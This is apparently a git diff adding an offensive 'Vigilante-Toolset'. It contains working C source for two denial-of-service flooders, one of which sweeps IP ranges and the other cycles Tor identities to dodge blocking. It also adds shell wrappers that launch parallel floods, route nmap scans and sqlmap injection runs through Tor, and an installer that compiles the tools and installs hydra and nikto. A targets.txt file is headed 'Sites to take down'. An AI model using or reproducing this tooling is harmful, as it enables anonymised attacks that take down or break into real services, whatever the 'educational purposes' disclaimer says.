*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int Threads = 0; +int Connections = 0; + +int make_socket(char *host, char *port, int modus) +{ + struct addrinfo hints, *servinfo, *p; + int sock, r; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + + if(modus) + hints.ai_socktype = SOCK_STREAM;//TCP + else + hints.ai_socktype = SOCK_DGRAM;//UDP + + if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) + { + fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); + exit(0); + } + for(p = servinfo; p != NULL; p = p->ai_next) + { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) + continue; + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) + { + close(sock); + continue; + } + break; + } + if(p == NULL) + { + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "No connection could be made: %s\n", host); + exit(0); + } + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "[Connected -> %s:%s]\n", host, port); + return sock; +} + +void broke(int s) +{ + // do nothing +} + +void attack(char *host, char *port, int id, int modus) +{ + int sockets; + int r, i, n, buf; + int x = 0; + char string[100]; + static int j = 0; + char httpbuf[2024]; + char s_copy[132]; + + sockets = 0; + signal(SIGPIPE, &broke); + + while(1) + { + x = 0; + while(x != Connections) + { + if(sockets == 0) + sockets = make_socket(host, port, modus); + + srand(time(NULL)); + for( j = 0; j < 99; j++) + string[j] = 'A' + rand()%26; // starting on '0', ending on '}' + + sprintf(httpbuf, "GET /%s HTTP/1.0\r\n\r\n", string); + strncpy(s_copy, httpbuf, sizeof(s_copy)); + int sizebuf = sizeof s_copy - 1; + r=write(sockets, s_copy, sizebuf); + close(sockets); + sockets = make_socket(host, port, modus); + fprintf(stderr, "Thread:%i Connection:%d %s", id,x,s_copy); + x++; + } + usleep(100000); + } +} +int force(char *host, int modus, char *port) +{ + char *i; + char *p; + int stelle; + int x = 0; + + p = host; + i = strrchr(host, 46); + stelle = (i - p) + 1; + + if(host[stelle] != '\0') + return 0; + + for(int l=0; l <= 2; l++) + { + if(l != 0) + host[stelle] = 48 + l; + for(int k=0; k <= 9; k++) + { + if(k != 0 && l == 0) + host[stelle] = 48 + k; + if(k != 0 && l != 0) + host[stelle + 1] = 48 + k; + if(k == 0 && l != 0) + host[stelle + 1] = 48 + k; + if(l == 2 && k == 6) + break; + for(int j=48; j <= 57; j++) + { + if(k == 0 && l == 0) + host[stelle] = j; + else if(l == 0 && k != 0) + host[stelle + 1] = j; + else + host[stelle + 2] = j; + if(l == 2 && k == 5 && j == 53) + break; + while(x != Threads) + { + printf("Start IP: %s\n", host); + ++x; + if(fork()) + attack(host, port, x, modus); + usleep(100000); + } + x = 0; + } + } + } +} +int main(int argc, char **argv) +{ + int x = 0; + int modus; + char ip[30]; + char port[6]; + + printf("!!This tool is for educational purposes, I take no responsibility for its misuse!!\n"); + printf("Modus:MemAMPDDoD by: M.B. Hudson (hose from 0 to 3) =====> 0=UDP 1=TCP with HTTP Requests\n"); + scanf("%d", &modus); + printf("ENTER IP or TARGET or Brute Force a range by added /24 at the end of TARGET URL =====>\n"); + scanf("%s", &ip); + printf("ENTER ATTACK Port =====>\n"); + scanf("%s",&port); + printf("How Many Connections? (example: 20) ======>\n"); + scanf("%d",&Connections); + printf("How Many Thread Per Connection? =====> \n"); + scanf("%d",&Threads); + + if(!(force(ip, modus, port))) + { + while(x != Threads) + { + ++x; + if(fork()) + attack(ip, port, x, modus); + usleep(100000); + } + } + getc(stdin); + return 0; +} diff --git a/cport.sh b/cport.sh new file mode 100644 index 0000000..d6fdc50 --- /dev/null +++ b/cport.sh @@ -0,0 +1,16 @@ +#!/bin/bash +echo "Connecting to TOR." +service tor start +clear +echo ""CONNECTED TO TOR!"" +echo "Starting Docker" +service docker start +clear +echo "DOCKER STARTED!" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "-p 21,22,23,25,80,135,139,443,8080,8000,9050,4444 wwfmgeecv2aflaopqvfdad.onion" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET:" +read vartarget +sudo docker run --rm -it milesrichardson/onion-nmap $vartarget +read -p "Press [Enter] key to start backup..." diff --git a/cproxy.sh b/cproxy.sh new file mode 100644 index 0000000..5b9e25a --- /dev/null +++ b/cproxy.sh @@ -0,0 +1,31 @@ +#!/bin/bash +echo Connecting to TOR. +service tor start +clear +echo Connecting to TOR.. +sleep .4 +clear +echo Connecting to TOR... +sleep .4 +clear +echo Connecting to TOR.... +sleep .4 +sleep +echo Connecting to TOR..... +clear +echo -e "\e[5m!!!Please keep this terminal running in order to maintain connections to TOR & proxy server!!!" +echo -e "\e[0m" + + +echo -e "\e[45m-----= Minimizing the terminal is suggested =-----" +echo -e "\e[0m" +echo -e "Connecting to TOR...... \e[5mCONNECTED!" +echo -e "\e[0m" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "example: jhef7rge64g47fh4dd4h.onion:80" +echo "If attacking a SQL server use something like http://site.com/vuln.php?id=1:80" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET URL:" +read vartarget +sudo socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:$vartarget,socksport=9050 + diff --git a/ddos b/ddos new file mode 100644 index 0000000..deaebab Binary files /dev/null and b/ddos differ diff --git a/ddos.c b/ddos.c new file mode 100644 index 0000000..d1f81e0 --- /dev/null +++ b/ddos.c @@ -0,0 +1,100 @@ +/* XerXes - Most powerful dos tool */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int make_socket(char *host, char *port) { + struct addrinfo hints, *servinfo, *p; + int sock, r; +// fprintf(stderr, "[Connecting -> %s:%s\n", host, port); + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { + fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); + exit(0); + } + for(p = servinfo; p != NULL; p = p->ai_next) { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { + continue; + } + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { + close(sock); + continue; + } + break; + } + if(p == NULL) { + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "No connection could be made\n"); + exit(0); + } + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "[Connected -> %s:%s]\n", host, port); + return sock; +} + +void broke(int s) { + // do nothing +} + +#define CONNECTIONS 8 +#define THREADS 48 + +void attack(char *host, char *port, int id) { + int sockets[CONNECTIONS]; + int x, g=1, r; + for(x=0; x!= CONNECTIONS; x++) + sockets[x]=0; + signal(SIGPIPE, &broke); + while(1) { + for(x=0; x != CONNECTIONS; x++) { + if(sockets[x] == 0) + sockets[x] = make_socket(host, port); + r=write(sockets[x], "\0", 1); + if(r == -1) { + close(sockets[x]); + sockets[x] = make_socket(host, port); + } else +// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); + fprintf(stderr, "[%i: Voly Sent]\n", id); + } + fprintf(stderr, "[%i: Voly Sent]\n", id); + usleep(300000); + } +} + +void cycle_identity() { + int r; + int socket = make_socket("localhost", "9050"); + write(socket, "AUTHENTICATE \"\"\n", 16); + while(1) { + r=write(socket, "signal NEWNYM\n\x00", 16); + fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); + usleep(300000); + } +} + +int main(int argc, char **argv) { + int x; + if(argc !=3) + cycle_identity(); + for(x=0; x != THREADS; x++) { + if(fork()) + attack(argv[1], argv[2], x); + usleep(200000); + } + getc(stdin); + return 0; +} diff --git a/ddos.sh b/ddos.sh new file mode 100644 index 0000000..9fef12a --- /dev/null +++ b/ddos.sh @@ -0,0 +1,21 @@ +#!/bin/bash +clear +echo "=====================================================================" +echo "EtherApe is a visual tool that will show you information such as" +echo "what you are attacking and at what rate you are attacking." +echo "--------------------------------------------------------------------" +sleep 1.5 +echo "You may also run this script more than once at the same time" +echo "in an effort to be more effective; or choose menu 2 option 6" +echo "====================================================================" +echo +echo +echo +echo "____________________________________________________________________" +echo "Use Nmap, menu 1 option 3, to see open ports." +echo "Ports like: 8000 or 80, 21, 22, 443; 8080," +echo +echo +echo "Enter PORT:" +read varport +sudo /home/binbash/Vigilante-Toolset/ddos 127.0.0.1 $varport diff --git a/ddos8000.sh b/ddos8000.sh new file mode 100644 index 0000000..cff26e4 --- /dev/null +++ b/ddos8000.sh @@ -0,0 +1 @@ +sudo /home/binbash/Vigilante-Toolset/ddos 127.0.0.1 8000 diff --git a/ddosx4.sh b/ddosx4.sh new file mode 100644 index 0000000..fe65359 --- /dev/null +++ b/ddosx4.sh @@ -0,0 +1,7 @@ +#!/usr/bin/env bash +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" & +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" & +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" & +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" + + diff --git a/install.sh b/install.sh new file mode 100644 index 0000000..7862e12 --- /dev/null +++ b/install.sh @@ -0,0 +1,45 @@ +sudo apt-get update +sudo apt-get install terminator -y +sudo apt-get install nikto -y +sudo apt-get install python3 -y +sudo apt-get install python3-pip -y +sudo apt-get install sqlmap -y +sudo apt-get install uniscan -y +sudo apt-get install socat -y +sudo apt-get install hydra -y +sudo apt-get install tor -y +sudo apt-get install nmap -y +sudo apt-get install torbrowser-launcher -y +sudo apt-get install etherape -y +sudo apt install proxychains4 -y +sudo apt install docker +sudo apt install docker.io +sudo gcc ddos.c -o ddos +sudo gcc cDDoS.c -o cDDoS +sudo chmod +x proxy.sh +sudo chmod +x cproxy.sh +sudo chmod +x bruTOR.sh +sudo chmod +x bruTOR +sudo chmod +x cport.sh +sudo chmod +x ddos.sh +sudo chmod +x ddos8000.sh +sudo chmod +x ddosx4.sh +sudo chmod +x nmap.sh +sudo chmod +x proxy.sh +sudo chmod +x run.sh +sudo chmod +x sql.sh +sudo chmod +x TorHunter +echo "PLEASE ENTER THE USERNAME OF THE SESSION YOU ARE CURRENTLY LOGGED IN AS:" +echo " YOUR USERNAME IS PROBABLY:" "$USER" +read varusername +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' TorHunter +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' bruTOR.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' cport.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' cproxy.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' ddos.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' ddos8000.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' ddosx4.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' nmap.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' proxy.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' sql.sh +sudo ./TorHunter diff --git a/nmap.sh b/nmap.sh new file mode 100644 index 0000000..a0b676b --- /dev/null +++ b/nmap.sh @@ -0,0 +1,15 @@ +#!/bin/bash +echo Connecting to TOR. +sudo service tor start +clear +CONNECTED TO TOR! +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "example: jhef7rge64g47fh4dd4h.onion" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET URL:" +read vartarget +sudo proxychains4 nmap -Pn -sT -v $vartarget +read -p "Press [Enter] key to start backup..." + + + diff --git a/proxy.sh b/proxy.sh new file mode 100644 index 0000000..b14e4c4 --- /dev/null +++ b/proxy.sh @@ -0,0 +1,33 @@ +#!/bin/bash +echo Connecting to TOR. +sudo service tor start +clear +echo Connecting to TOR.. +sleep .4 +clear +echo Connecting to TOR... +sleep .4 +clear +echo Connecting to TOR.... +sleep .4 +sleep +echo Connecting to TOR..... +clear +echo -e "\e[5m!!!Please keep this terminal running in order to maintain connections to TOR & proxy server!!!" +echo -e "\e[0m" + + +echo -e "\e[45m-----= Minimizing the terminal is suggested =-----" +echo -e "\e[0m" +echo -e "Connecting to TOR...... \e[5mCONNECTED!" +echo -e "\e[0m" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "example: jhef7rge64g47fh4dd4h.onion" +echo "If attacking a SQL server use something like http://www.site.com/vuln.php?id=1" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET URL:" +read vartarget +sudo socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:$vartarget:80,socksport=9050 + + + diff --git a/run.sh b/run.sh new file mode 100644 index 0000000..f232af3 --- /dev/null +++ b/run.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +export PATH="/custom/bin:$PATH" + +arg_in_path() { + which "$1" >/dev/null 2>&1 && return 0 + return 1 +} + +arg_is_cmd() { + test -x "$1" && return 0 || return 1 +} + +arg_is_executable() { + if arg_in_path "$1" ; then + return 0 + elif arg_is_cmd "$1" ; then + return 0 + else + return 1 + fi +} + +tor_boot + +if test -z "$1" ; then + echo "No arguments given to run, launching /bin/sh..." + exec /bin/sh +elif arg_is_executable "$1" ; then + echo "[nmap onion]" "$@" + exec "$@" +else + echo "[nmap onion] nmap" "$@" + exec "nmap" "$@" +fi diff --git a/sql.sh b/sql.sh new file mode 100644 index 0000000..117b929 --- /dev/null +++ b/sql.sh @@ -0,0 +1,8 @@ +#!/bin/bash +echo "example: http://www.site.com/vuln.php?id=1" +echo "ENTER TARGET URL:" +read vartarget +sudo sqlmap -u $vartarget --tor --time-sec 20 --crawl=2 --random-agent +read -p "Press [Enter] key to start backup..." + + diff --git a/targets.txt b/targets.txt new file mode 100644 index 0000000..7de1c0c --- /dev/null +++ b/targets.txt @@ -0,0 +1,3 @@ +<><><><><><><><><> +Sites to take down +<><><><><><><><><>